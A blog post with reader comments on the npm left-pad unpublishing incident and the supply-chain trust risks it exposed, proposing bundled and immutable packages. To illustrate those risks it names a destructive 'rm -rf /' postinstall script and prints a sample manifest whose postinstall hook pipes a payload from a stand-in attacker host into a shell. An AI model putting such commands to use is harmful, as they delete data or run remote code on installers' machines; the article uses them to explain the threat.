The npm Meltdown Uncovers Serious Security Risks

Earlier this week, as almost everyone reading this article knows, npm experienced a brief service interruption where npm install would fail for heaps of popular packages such as Babel and React Native, because somewhere deep in their dependency chains there was left-pad, a popular package that had just been unpublished. This event raises serious security concerns about how we’re handling dependencies in the JavaScript world.

For context, here’s a recap of the events leading up to the short-lived npm install issues earlier this week.

  • Azer published an open-source library as the kik package on npm
  • Kik wanted to use the kik package, and they approached Azer about it
  • Azer didn’t want to give up the kik package name
  • Kik approached npm through its conflict resolution policy about a solution
  • npm transferred ownership of kik to Kik
  • Azer retaliated by unpublishing all of his packages from npm
  • One of those packages, left-pad, was a popular dependency, underlying many other packages in the ecosystem
  • npm install started failing across the board for every package that had a dependency on left-pad@0.0.3
  • A third party published left-pad@1.0.0 with a copy of left-pad@0.0.3, but it didn’t help much
  • npm allowed that same third party to re-publish left-pad@0.0.3 as an exact copy of the unpublished package
  • Service was restored

From there, dozens of articles and tweets about the event were dispatched. Some questioned Kik’s claim to ownership of the kik package name. Some questioned Azer’s retaliation causing more damage to the community than to Kik. Some questioned npm for allowing a user to un-break the ecosystem by re-publishing an unpublished and fully open-source package. Some questioned npm for allowing users to npm unpublish in the first place. Some questioned npm for defending their interests over Azer’s and giving up ownership of kik.

The root cause of all of the above is, of course, trust. And it runs deep. In this article I want to go over the implications and hopefully trigger a constructive discussion around the topic.

Trust Issues

A few hours ago, a discussion started on npm/npm#12045 about whether we should trust npm. Trusting npm as a company is beside the point, though. A more important question is whether we can trust what people publish on npm.

Can we trust package authors?

There are about Infinity possible security risks posed by an npm package author “going rogue”, having his account compromised, or even making a mistake. Let’s enumerate a few scenarios where "a package author decided to ${action}" would result in pain and suffering for the ecosystem as a whole.

  • Unpublish a popular module, preventing its dependants, and their dependants’ dependants, from ever being installed again unless npm chimed in
  • Include a postinstall script such as rm -rf /
  • Include a postinstall script such as npm unpublish
  • Include a postinstall script that allows for remote code execution (a sketch of such a manifest follows this list)
  • Publish a semver patch version containing a bug that makes the package unusable
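
To make the postinstall risk concrete, here’s a minimal sketch of what a malicious package manifest could look like; the package name and payload URL are made up for illustration.

    {
      "name": "innocent-looking-package",
      "version": "1.0.1",
      "scripts": {
        "postinstall": "curl -s https://evil.example.com/payload.sh | sh"
      }
    }

That script runs automatically on every machine that installs the package, or any package that depends on it, which is what makes this class of attack so dangerous.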

Even if we make npm unpublish harder or even impossible, the community’s reliance on semver means we would still be exposed to plenty of other vulnerabilities that may well fly under our radar, and that could be introduced at any point in time by a bad actor, such as a rogue package author or someone taking over the account of a popular package holder.

The vast majority of npm users are benevolent, though. This is why semver mostly works.

Trusting package authors mostly works. Until it doesn’t.

Thus, we came up with techniques such as npm shrinkwrap, or simply bundling your dependencies on npm publish, so that we can trust a snapshot of what package authors produce rather than everything they may publish later. How is doing that any different from getting rid of semver, something that has been posited in the past without gaining much traction?
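
As a reference point, npm shrinkwrap is the simpler of those techniques: it writes the exact version of every package in your current tree into npm-shrinkwrap.json, which npm honors on subsequent installs. A minimal sketch of the workflow:

    # install and test against the versions you want to lock down
    npm install
    npm test

    # write npm-shrinkwrap.json, pinning the entire dependency tree
    npm shrinkwrap

    # commit the lockfile so every install reproduces the same tree
    git add npm-shrinkwrap.json
    git commit -m "Lock down dependency tree"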

Again, semver mostly works, so we’re reluctant to stop relying on it. There is real value in semver, after all.

The Fix: Bundling Before Publishing

Bundling on publish means that we take advantage of our dependencies being semantically versioned during development, but won’t allow ourselves to publish a package that may mutate over time. At the same time, installs will be faster because we won’t be relying on npm to resolve a bunch of dependencies. This is basically what Rich argues in his Medium article, and partly what I’ve argued in my article about semver.
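
One way to do this with npm today is the bundledDependencies field in package.json, which tells npm publish to pack copies of the listed dependencies into the tarball itself. A minimal sketch, with a made-up package name:

    {
      "name": "my-library",
      "version": "2.1.0",
      "dependencies": {
        "left-pad": "^1.0.0"
      },
      "bundledDependencies": [
        "left-pad"
      ]
    }

With that in place, installs of my-library no longer depend on left-pad remaining available, or unchanged, on the registry.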

Does bundling on publish mean our dependants lose the ability to take advantage of semver?

No.

Semantic Versioning Can Still Help us During Development

Not allowing semantic versioning to leak through the entire dependency tree is the healthy approach to take here.

This is no different to Browserify having transforms run only at the local package level: the package author knows what transforms are best for their package, but they don’t really know their dependencies, or whether something will break at some point by running those transforms on a global scale. The author of dependencies can’t foresee every possible transform that’d be run against their code, so Browserify compromises on defaulting to local transforms. Semantic versioning is the same thing, but it’s lacking a sensible default.
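
For reference, this is roughly how Browserify keeps transforms local: they’re declared in the package’s own package.json and only apply to that package’s files. The package name and the transform named here, brfs, are just examples:

    {
      "name": "my-package",
      "browserify": {
        "transform": ["brfs"]
      }
    }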

Then there’s the issue of code duplication, but that’s a story for another day. I’ll take code duplication over fear of bringing services down any day. When it comes to front-end development, code duplication should be taken seriously, though, and npm is probably the best place where we can come up with a solution to that problem.

Immutability, Predictability, and a Possibly-Service-Provided Solution

Another take on fixing this issue would be having an immutable version of npm, let’s call it ipm. In this scenario, we’d keep semver for local development but there’d be a twist: anything ever published to ipm would remain on ipm forever. Unpublishing would only be possible through a DMCA process. At the time of publishing an example@version package, ipm would take care of computing all dependencies for example@version, respecting semver throughout the dependency graph, and bundling them together with the published example@version package. When example@version is installed, the exact same content would be downloaded every time. There wouldn’t be any need for package authors to take on the obnoxious task of bundling things together, because the ipm service would take care of that for them. The service should also be smart enough to bundle packages in such a way that code duplication is reduced to a minimum.
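
To illustrate, here’s a rough sketch of what a frozen manifest on ipm might look like for a hypothetical example@1.2.0: the dependency graph is resolved once, at publish time, and every install downloads the exact same bundle. ipm doesn’t exist, so every field name here is made up.

    {
      "name": "example",
      "version": "1.2.0",
      "resolvedAt": "2016-03-26T00:00:00.000Z",
      "frozenDependencies": {
        "left-pad": "1.0.0"
      },
      "bundle": "example-1.2.0-bundle.tgz",
      "integrity": "sha256-<checksum of the bundle>"
    }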

A service like ipm, when widely adopted by the community, would accomplish two things.

First, situations such as a package author unpublishing a popular module and causing ipm install to fail across the board would be avoided by preventing user-powered unpublishing entirely. If a DMCA notice or similar legal reason were to trigger the take-down of the doge package from the registry, then things that depended on doge would remain unaffected because doge was previously bundled into their dependants. Similarly, if a malicious user decided to introduce a postinstall vulnerability, it would only affect development environments and those who decide to update their doge dependency without verifying its integrity through one of those monitoring solutions which ensure packages on npm don’t go rogue.

Trusting others is the foundation of our community, but everyone can make mistakes and some can go rogue. We can’t rely on trust alone.

Second, and perhaps most importantly, it’d introduce predictability, something we’ve been sorely missing lately in the grand scheme of all things web development. By staying immutable at the source, ipm would allow intermediary services such as Travis (as well as npm end users) to heavily cache those immutable packages that are known never to change. Even if development versions take full advantage of (one level deep) semver ranges, each package downloaded with ipm install would be a never-changing bundle. Installation times would also go down significantly: even when the bundles aren’t cached, ipm would have pre-computed all the necessary files for each dependency. No more tree-deep request-fests! 🌳
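
As a concrete example of the kind of caching this enables, Travis can already cache directories between builds; with truly immutable packages, a cached node_modules would never need to be invalidated for dependencies that haven’t changed. A minimal .travis.yml sketch:

    language: node_js
    node_js:
      - "4"
    cache:
      directories:
        - node_modules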

Predictability shouldn’t be as undervalued as it is today.

If anything, predictability speeds up our development and deployment processes. At its best, it prevents mistakes that stem from “lazy developers not bundling their code before deployment for every single package they create ever”. Of course, I disagree with the notion of lazy developers – that’s an oxymoron. But, as the lazy developers we strive to be, this problem should be resolved at the source, and not at the individual community contributor level. It’s far too important an issue for each individual to be expected to take responsibility. The service needs to step up.

Comments

Tim Whidden wrote

It seems that bundling would be problematic for client side development, where you need the flattest node_modules you can generate. For example, when you webpack your code for the browser, you wouldn’t want multiple versions of a dependency in the browser bundle.

Yago Riveiro wrote

Trust is a bidirectional relationship. As a package author, can I trust npm when a series of emails from a company is enough to get my package hijacked?

npm should leave this kind of problem to the law, and not take part in it like a judge. Tomorrow Facebook launches an incredible new service with the same name as my widely used package and I’m literally f***ed, because npm has set a nasty precedent.

A package distribution system should belong to the community, not to a private company with private interests behind it.

With this kind of issue (npm and rogue authors), the only decent way to make sure we don’t end up in the middle of a meltdown like this is hosting your dependencies on your own. It’s a pain in the ass, but it’s safe.

P.S.: There was a simple solution: kik-com, since kik was already taken.

Peter Demling wrote

I’ve had what I think are two helpful reactions to this so far: gratitude, and fortitude.

First, gratitude to the thousands of people like Azer, who freely contribute their time and effort to open-source, letting me use the fruits of their creative efforts so that I don’t have to figure it all out myself. It’s standing on the shoulders of a host of benevolent giants, day after day, and I just assume it’s all going to work fine - and 99.9% of the time, it does. Azer and all open-source contributors (even the big agenda-driven companies) owe us nothing, and we have no basis for complaining when we have problems with the free stuff. Thankfully, most of what I’m hearing from the community echoes this sentiment. We need to remember this in the future, when companies try to bully their way into (npm) namespaces with increased frequency and power.

Second, fortitude in the build process: time for JS to embrace some more robust deploy practices, I think; or else be content with the exposed risk. We’re using open-source, people: if you depend on something outside your network to be there at deploy time, don’t be surprised if it’s not there! And if you do need to guarantee a reliable/robust build, then make sure you have a (local) copy of all the code you need. This can be as simple as adding node_modules to your repo: http://stackoverflow.com/questions/18128863/should-node-modules-folder-be-included-in-the-git-repository .
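
A minimal sketch of that approach, assuming node_modules is currently listed in your .gitignore:

    # stop ignoring installed dependencies and commit them
    # (also remove the node_modules entry from .gitignore)
    git add -f node_modules
    git commit -m "Vendor dependencies for reproducible builds"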

Or don’t! The choice is up to you, and this level of insurance may not be worth the effort in your particular context. For example, in my experience with enterprise apps in other languages, it would be unthinkable to leave code dependencies unresolved until deploy time. But that’s the beauty of the open web, and the exponential rate at which this JS ecosystem is evolving: there’s probably not one way that we all need/should follow, and I think that’s okay: just make sure to follow your path with eyes wide open.

Carlos Vega wrote

I like this; it does sound like a possible solution. However, I have one concern: how would the licenses of the bundled code affect my own code? If every package author uses permissive licenses like MIT, everything should be fine, but what about the more restrictive ones? This could imply legal consequences for individuals and/or companies using these bundled packages.

Jess Telford wrote

shrinkpack provides a lot of the immutability of packages you are calling for, but without the overhead of having to trust another service.
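
For anyone unfamiliar with it, the workflow is roughly the following; this is from memory, so check the shrinkpack README for the authoritative steps.

    # pin exact versions for the whole tree
    npm shrinkwrap

    # copy each dependency's tarball into the repository and point
    # npm-shrinkwrap.json at those local tarballs
    npm install -g shrinkpack
    shrinkpack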

The biggest downside with shrinkpack is that your git history could potentially become very large.

Alpha wrote

In the case of ipm, there are a few things more to consider:

  1. An actual DMCA take-down would affect all related packages, contrary to what you claim. A name conflict like the one Azer had likely would not, since a folder name somewhere is unlikely to be within reach of the law. However, if the concern is with the content of the code, then the package would most likely have to be removed along with every copy of it on the server.

  2. ipm performing “shrinkwrapping” or freezing packages would likely break npm’s ability to give you variations of dependencies. This has given me my fair share of headaches too, but it is indeed a feature that people may be using. (Are there any? I actually stopped doing so, locking my versions to the specific ones I requested.)

Thisconnect wrote

Is it time for a distributed blockchain style npm?

Damian wrote

I’m curious, have there been any/many cases where npm packages have actually been compromised using the techniques, or similar, stated in this article?

A quick search online brings up a lot of articles warning about the potential but none (that I could see) about specific examples?

Nicolas Bevacqua wrote

The fact that anyone could perform these attacks with relative ease, plus the attack described in the CERT vulnerability disclosure, should be more than enough. Why wait until someone actually does any of this?

InternetBaby wrote

Having a private entity as the single source of packages is bad. The question of trusting authors is irrelevant, since once a package is in the wild, it cannot disappear. The problem is that packages do not get in the wild; they get on npm, where they can disappear from. In the true spirit of open source we need an open, distributed, and democratic way of sharing and reusing code, like https://github.com/everythingstays/everythingstays

Brook Monroe wrote

After watching the debacle (and I’m not taking any side but my own), all I have to say is that WebAssembly can’t get here fast enough.

Nicolás Bevacqua wrote

WebAssembly doesn’t have anything to do with these issues, though. How do you expect it to fix any of this?

Michael van Olden wrote

To help thwart malicious code, some audit process would be wise. Npm could simply create a community audit system where any new version of a package would be placed on a temporary hold until a pre-determined number of ‘community auditors’ approve the code first. Once the code meets the approval threshold, it would be released for public consumption.

Additionally, every package accepted into public deployment should be archived, with no expectation of that public version ever being allowed to revert to private again.